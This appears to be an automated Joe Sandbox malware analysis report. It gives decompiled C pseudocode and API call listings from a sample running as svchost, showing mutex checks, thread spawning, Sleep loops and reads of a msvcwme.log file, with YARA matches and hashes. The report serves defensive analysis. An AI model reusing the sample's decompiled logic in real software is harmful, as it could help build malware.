                                                								_t27 =  *0x6fd6b718; // 0x3017218
                                                								_push( &_v12);
                                                								 *((intOrPtr*)(_t34 + 4)) = 0;
                                                								_push( &_v8);
                                                								_push( *_t34);
                                                								_v8 = 0;
                                                								_v12 = 0;
                                                								if( *((intOrPtr*)( *((intOrPtr*)( *_t27 + 4))))() != 0) {
                                                									E6FD54CC0(_v8, _t35);
                                                								}
                                                							}
                                                							_t25 =  *0x6fd6ac48; // 0x0
                                                						}
                                                						_t35 = _t35 + 1;
                                                					} while (_t35 < _t25);
                                                					L10:
                                                					LeaveCriticalSection(0x6fd6ac2c);
                                                					Sleep(0x7530); // executed
                                                				}
                                                			}











                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC2C), ref: 6FD55335
                                                • GetTickCount.KERNEL32 ref: 6FD5535B
                                                • LeaveCriticalSection.KERNEL32(6FD6AC2C), ref: 6FD553B9
                                                • Sleep.KERNELBASE(00007530), ref: 6FD553C4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CountEnterLeaveSleepTick
                                                • String ID:
                                                • API String ID: 2162194193-0
                                                • Opcode ID: 2303f0fbe840f1073342db82e1bee6407e0de3c1d9691f9303f6ef85eef4c8b5
                                                • Instruction ID: f66a2140ae0cc1d7e35067d7c900df9189bb59189062077cd7c9b6675b5f6fa1
                                                • Opcode Fuzzy Hash: 2303f0fbe840f1073342db82e1bee6407e0de3c1d9691f9303f6ef85eef4c8b5
                                                • Instruction Fuzzy Hash: EC110274500611EBEF49EFA9CA84FADBBB2FF85304F054108D45997250DBB0B924CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E6FD54CC0(intOrPtr __ecx, void* __esi) {
                                                				long _v8;
                                                				void _t5;
                                                				void* _t6;
                                                				struct _SECURITY_ATTRIBUTES** _t8;
                                                				struct _SECURITY_ATTRIBUTES** _t10;
                                                				intOrPtr _t13;
                                                				void* _t15;
                                                				void _t16;
                                                				void* _t18;
                                                
                                                				_t15 = __esi;
                                                				_push(__ecx);
                                                				_t13 = __ecx;
                                                				if(__ecx != 0) {
                                                					_t21 =  *0x6fd6b718;
                                                					if( *0x6fd6b718 == 0) {
                                                						_t8 = E6FD559AF(__esi, _t21, 4);
                                                						_t18 = _t18 + 4;
                                                						 *0x6fd6b718 = _t8;
                                                						 *_t8 = 0;
                                                						 *_t8 = 0x6fd65f58;
                                                					}
                                                					_push(_t15);
                                                					_t5 = E6FD559AF(_t15, _t21, 4);
                                                					_t10 =  *0x6fd6b718; // 0x3017218
                                                					_t16 = _t5;
                                                					 *_t16 = _t10;
                                                					_t6 = E6FD559AF(_t16, _t21, 8);
                                                					 *((intOrPtr*)(_t6 + 4)) = _t13;
                                                					 *_t6 = _t16;
                                                					_v8 = 0;
                                                					CreateThread(0, 0, E6FD54CA0, _t6, 0,  &_v8); // executed
                                                				}
                                                				return 0;
                                                			}













                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 80ad869bdeb623c23aa924d56b7991d9ec4c058741464275859e2400e8d32bfb
                                                • Instruction ID: f94d2e1b3500ca23f772efdd950eb05a18a0d6ebd816eb6b2a47b65f11ce39e5
                                                • Opcode Fuzzy Hash: 80ad869bdeb623c23aa924d56b7991d9ec4c058741464275859e2400e8d32bfb
                                                • Instruction Fuzzy Hash: F3F0AFB4940304AFFF508F45C816B667BA8EB82734F14105AE6084B2D0EBB27964CBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD553D0(void* __edx, void* __eflags) {
                                                				void* __edi;
                                                				void* _t1;
                                                				void* _t3;
                                                				void* _t7;
                                                
                                                				Sleep(0x1388); // executed
                                                				_t1 = E6FD549C0(Sleep); // executed
                                                				if(_t1 != 0) {
                                                					_t3 = E6FD548C0(_t7); // executed
                                                					if(_t3 != 0 && E6FD54950() != 0) {
                                                						CreateThread(0, 0, E6FD55290, 0, 0, 0); // executed
                                                						CreateThread(0, 0, E6FD55320, 0, 0, 0); // executed
                                                						L4:
                                                						Sleep(0x1388); // executed
                                                						goto L4;
                                                					}
                                                				}
                                                				return 0;
                                                			}








                                                APIs
                                                • Sleep.KERNELBASE(00001388,?,6FD5546F), ref: 6FD553DC
                                                  • Part of subcall function 6FD549C0: CreateMutexA.KERNELBASE ref: 6FD54A0D
                                                  • Part of subcall function 6FD549C0: GetLastError.KERNEL32 ref: 6FD54A15
                                                  • Part of subcall function 6FD549C0: ReleaseMutex.KERNEL32(00000000), ref: 6FD54A2C
                                                  • Part of subcall function 6FD549C0: CloseHandle.KERNEL32(00000000), ref: 6FD54A33
                                                  • Part of subcall function 6FD548C0: EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD5546F), ref: 6FD548D0
                                                  • Part of subcall function 6FD548C0: LocalFree.KERNELBASE(00000000), ref: 6FD54909
                                                  • Part of subcall function 6FD548C0: LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54928
                                                  • Part of subcall function 6FD54950: new.LIBCMT ref: 6FD54962
                                                  • Part of subcall function 6FD54950: LocalFree.KERNEL32(00000000), ref: 6FD549A9
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005290,00000000,00000000,00000000), ref: 6FD55408
                                                • CreateThread.KERNELBASE(00000000,00000000,6FD55320,00000000,00000000,00000000), ref: 6FD5541D
                                                • Sleep.KERNELBASE(00001388,?,6FD5546F), ref: 6FD55428
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Create$CriticalFreeLocalMutexSectionSleepThread$CloseEnterErrorHandleLastLeaveRelease
                                                • String ID:
                                                • API String ID: 3843465970-0
                                                • Opcode ID: 526a0971e5053b39539fffd79c3228c92fc4ec1614244668e3b180fc16c06d78
                                                • Instruction ID: 60de78d518344bdf0b139654e7247d013111541df5b3d96afa1daba05eb31657
                                                • Opcode Fuzzy Hash: 526a0971e5053b39539fffd79c3228c92fc4ec1614244668e3b180fc16c06d78
                                                • Instruction Fuzzy Hash: 23F0C2312C4700B5FEA267F82E06FA823115B86F9EF600141F700BE0C09AC170394A2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E6FD548C0(void* __ecx) {
                                                				void* _v8;
                                                				char _v12;
                                                				void* _t12;
                                                				signed int _t15;
                                                				void* _t19;
                                                				intOrPtr _t21;
                                                
                                                				_t19 = __ecx;
                                                				E6FD547E0();
                                                				EnterCriticalSection(0x6fd6ac7c);
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t12 = E6FD53EB0( &_v8,  &_v12); // executed
                                                				if(_t12 == 0) {
                                                					L4:
                                                					_push(0x6fd6ac7c);
                                                					goto L5;
                                                				} else {
                                                					_push(_t19);
                                                					E6FD53FA0(_v8, _v12); // executed
                                                					_t15 = LocalFree(_v8);
                                                					_t21 =  *0x6fd6ac98; // 0x14
                                                					if((_t15 & 0xffffff00 | _t21 != 0x00000000) == 0) {
                                                						goto L4;
                                                					} else {
                                                						_push(0x6fd6ac7c);
                                                						if(_t21 < 0xf) {
                                                							L5:
                                                							LeaveCriticalSection();
                                                							return 0;
                                                						} else {
                                                							LeaveCriticalSection();
                                                							E6FD54330();
                                                							return 1;
                                                						}
                                                					}
                                                				}
                                                			}










                                                APIs
                                                  • Part of subcall function 6FD547E0: EnterCriticalSection.KERNEL32(6FD6AC7C,73B76490,?,?,6FD548CB,?,6FD5546F), ref: 6FD547E8
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54818
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD54822
                                                  • Part of subcall function 6FD547E0: LeaveCriticalSection.KERNEL32(6FD6AC7C,?,?,6FD548CB,?,6FD5546F), ref: 6FD5484E
                                                  • Part of subcall function 6FD547E0: EnterCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD54859
                                                  • Part of subcall function 6FD547E0: LocalFree.KERNEL32(?,?,?,6FD548CB,?,6FD5546F), ref: 6FD5487E
                                                  • Part of subcall function 6FD547E0: LeaveCriticalSection.KERNEL32(6FD6AC54,?,?,6FD548CB,?,6FD5546F), ref: 6FD548AA
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD5546F), ref: 6FD548D0
                                                  • Part of subcall function 6FD53EB0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,6FD548F0,?), ref: 6FD53ED1
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5493E
                                                  • Part of subcall function 6FD53FA0: new.LIBCMT ref: 6FD53FC2
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD54013
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5401F
                                                  • Part of subcall function 6FD53FA0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5405C
                                                  • Part of subcall function 6FD53FA0: LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD540AC
                                                • LocalFree.KERNELBASE(00000000), ref: 6FD54909
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD54928
                                                  • Part of subcall function 6FD54330: EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54336
                                                  • Part of subcall function 6FD54330: LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543A4
                                                  • Part of subcall function 6FD54330: LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543EF
                                                  • Part of subcall function 6FD54330: LocalFree.KERNEL32(?,73B76490,?,?,6FD54933), ref: 6FD54400
                                                  • Part of subcall function 6FD54330: LeaveCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54422
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Local$CriticalSection$Free$Leave$Enter$Alloc$CreateFile
                                                • String ID:
                                                • API String ID: 3831489965-0
                                                • Opcode ID: 0527b808ca353ad1894e513da1410b7e3e15cbd463e05e033135f24cd79415f5
                                                • Instruction ID: 3947eea66175aaa9aa52da1020a27cd0cd41817de60d9959b5c4841e17421bcb
                                                • Opcode Fuzzy Hash: 0527b808ca353ad1894e513da1410b7e3e15cbd463e05e033135f24cd79415f5
                                                • Instruction Fuzzy Hash: F4018178800219EBDF409FA0E866BED7775AF07219F040199E84A57241DB317A39ABA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD55290() {
                                                				char _v8;
                                                				char _v12;
                                                				void* __esi;
                                                				intOrPtr _t11;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                				intOrPtr* _t17;
                                                				signed int _t22;
                                                
                                                				EnterCriticalSection(0x6fd6ac7c);
                                                				_t14 =  *0x6fd6ac98; // 0x14
                                                				_t22 = 0;
                                                				if(_t14 != 0) {
                                                					do {
                                                						_t17 = 0;
                                                						if(_t22 < _t14) {
                                                							_t11 =  *0x6fd6ac94; // 0x304ebb8
                                                							_t17 =  *((intOrPtr*)(_t11 + _t22 * 4));
                                                						}
                                                						if( *((char*)(_t17 + 0x3c)) != 0 &&  *((intOrPtr*)(_t17 + 0x4c)) == 0x86) {
                                                							_t15 =  *0x6fd6b718; // 0x3017218
                                                							_v8 = 0;
                                                							_v12 = 0;
                                                							_t11 =  *((intOrPtr*)( *((intOrPtr*)( *_t15 + 4))))( *_t17,  &_v8,  &_v12);
                                                							if(_t11 != 0) {
                                                								_t11 = E6FD54CC0(_v8, _t22);
                                                							}
                                                							_t14 =  *0x6fd6ac98; // 0x14
                                                						}
                                                						_t22 = _t22 + 1;
                                                					} while (_t22 < _t14);
                                                				}
                                                				LeaveCriticalSection(0x6fd6ac7c);
                                                				return _t11;
                                                			}












                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5529C
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C), ref: 6FD5530F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: d70462e7d7ba9e96bc2d03a8bd6ecc4d4105961cd19021fa533029ff03872601
                                                • Instruction ID: 56fccfe463f1ae518aafde4aa341363ddd5cc79f5ae0243fdf39a72daa9d32e5
                                                • Opcode Fuzzy Hash: d70462e7d7ba9e96bc2d03a8bd6ecc4d4105961cd19021fa533029ff03872601
                                                • Instruction Fuzzy Hash: 1C01F134500225DBEF52DB99D884FEDBBB1FF8631AF010099D8456B254CB70B965CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000011F0,?,00000000,00000000), ref: 039923CC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: bfbf2ff7a47345852df780ece80a4749cb84ead36ffef8d53aeb44ae5115d571
                                                • Instruction ID: 5db4dbc6846c1d245931fce604aefbb1eb4666be408056a3379d207c9d946b5a
                                                • Opcode Fuzzy Hash: bfbf2ff7a47345852df780ece80a4749cb84ead36ffef8d53aeb44ae5115d571
                                                • Instruction Fuzzy Hash: 08D0C93128430C7BFB20AA49AC46F4D7358E718F11F244801F624AA2C1C5E1F4605618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,039AFE59,?,00000000), ref: 039AFBD3
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,039AFE59,?,00000000), ref: 039AFBFC
                                                • GetACP.KERNEL32(?,?,039AFE59,?,00000000), ref: 039AFC11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: af0c30d598caa44b6dceaaba04d795e226bd8ab0c8a678fb579a0ec64f26f380
                                                • Instruction ID: 2ccc183be7978ff752e3238abdf658e9c415433d7105b5c3457ac9bf66dd0dc4
                                                • Opcode Fuzzy Hash: af0c30d598caa44b6dceaaba04d795e226bd8ab0c8a678fb579a0ec64f26f380
                                                • Instruction Fuzzy Hash: C5218632604902AAD734DF5DDE14A97B3FEAF44BA4B4986A4E90FD7100E732D941C7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 039AFE1A
                                                • IsValidCodePage.KERNEL32(00000000), ref: 039AFE75
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 039AFE84
                                                • GetLocaleInfoW.KERNEL32(?,00001001,039A7203,00000040,?,039A7323,00000055,00000000,?,?,00000055,00000000), ref: 039AFECC
                                                • GetLocaleInfoW.KERNEL32(?,00001002,039A7283,00000040), ref: 039AFEEB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                • String ID:
                                                • API String ID: 745075371-0
                                                • Opcode ID: 6c3cabcdb998c08b40ae99b78623b71c00ab92bf455bc9e62ef00e8d658860ea
                                                • Instruction ID: c5ec6242c5ea861d3d6efa8d2b221947553614ebecafc02c92ca9177b2a0228d
                                                • Opcode Fuzzy Hash: 6c3cabcdb998c08b40ae99b78623b71c00ab92bf455bc9e62ef00e8d658860ea
                                                • Instruction Fuzzy Hash: DA51C676A00619AFDF21EFADDC44ABEB3BCEF54340F184665E906EB140E7709904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,73B76490,73BCF7E0), ref: 03998AA8
                                                • IsDebuggerPresent.KERNEL32(?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B70
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B8F
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,73B76490,73BCF7E0), ref: 03998B99
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: bddcc24c3546070bec02c55868a68398c1f7ead316077c87a7cdf63df0531256
                                                • Instruction ID: ec8ab4e47d123c455f996517b444176a73ec7806c69add73146830243a876259
                                                • Opcode Fuzzy Hash: bddcc24c3546070bec02c55868a68398c1f7ead316077c87a7cdf63df0531256
                                                • Instruction Fuzzy Hash: E931FAB5D4622C9BDF10DFA5D9886DDBBB8EF09344F1041EAE40DAB210EB715A84CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,039A6CC3,?,00000004), ref: 039A5208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                • Opcode ID: d98c304034fd4c9d41a88c1e33e44f884a86b253bfbbf5f2010a741c16f027ae
                                                • Instruction ID: 3554d6a9a81908e879f1c0fb6490bde4f9f6950d6dd71995660a79955870555a
                                                • Opcode Fuzzy Hash: d98c304034fd4c9d41a88c1e33e44f884a86b253bfbbf5f2010a741c16f027ae
                                                • Instruction Fuzzy Hash: 6CF0F031B01218BBDF02EFAA9D05EAF7B65EB85750F014209FC052E251DA728D20AAD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,039A720A,?,?,?,?,039A6CC3,?,00000004), ref: 039AF4B8
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,039A720A,00000000,039A732A), ref: 039AF5F9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                • String ID:
                                                • API String ID: 1661935332-0
                                                • Opcode ID: 7083ccf0e19957b36b611b81989df5ac6da934044a4ba674c1cf35550fc542ec
                                                • Instruction ID: a388dc8f78f6a7c1b6bb127c84e83d2d971bb7f31d786f8da4cf9904a32b5a0a
                                                • Opcode Fuzzy Hash: 7083ccf0e19957b36b611b81989df5ac6da934044a4ba674c1cf35550fc542ec
                                                • Instruction Fuzzy Hash: F461E976A00B06AAD724EF7CCC45AB7B3ECEF48740F194669E946DB180EB70D54087E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 039AFA65
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: 83a1c46cffe90023646ec256352b65262c4683222cc6c059db7034476e8c1bd3
                                                • Instruction ID: d11f2727badc593259fd8982ce8a477a4037992d150d1663cd7dc83445c1de57
                                                • Opcode Fuzzy Hash: 83a1c46cffe90023646ec256352b65262c4683222cc6c059db7034476e8c1bd3
                                                • Instruction Fuzzy Hash: 7021D432510A06ABEB24EE6DDC41FBA73ACEF44754F1442BAED02CA140FB759941CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • EnumSystemLocalesW.KERNEL32(039AF7C1,00000001,00000000,?,039A7203,?,039AFDEE,00000000,?,?,?), ref: 039AF70B
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,039AFABC,00000000,00000000,?), ref: 039AFC6D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F41
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 039AFA65
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                Uniqueness

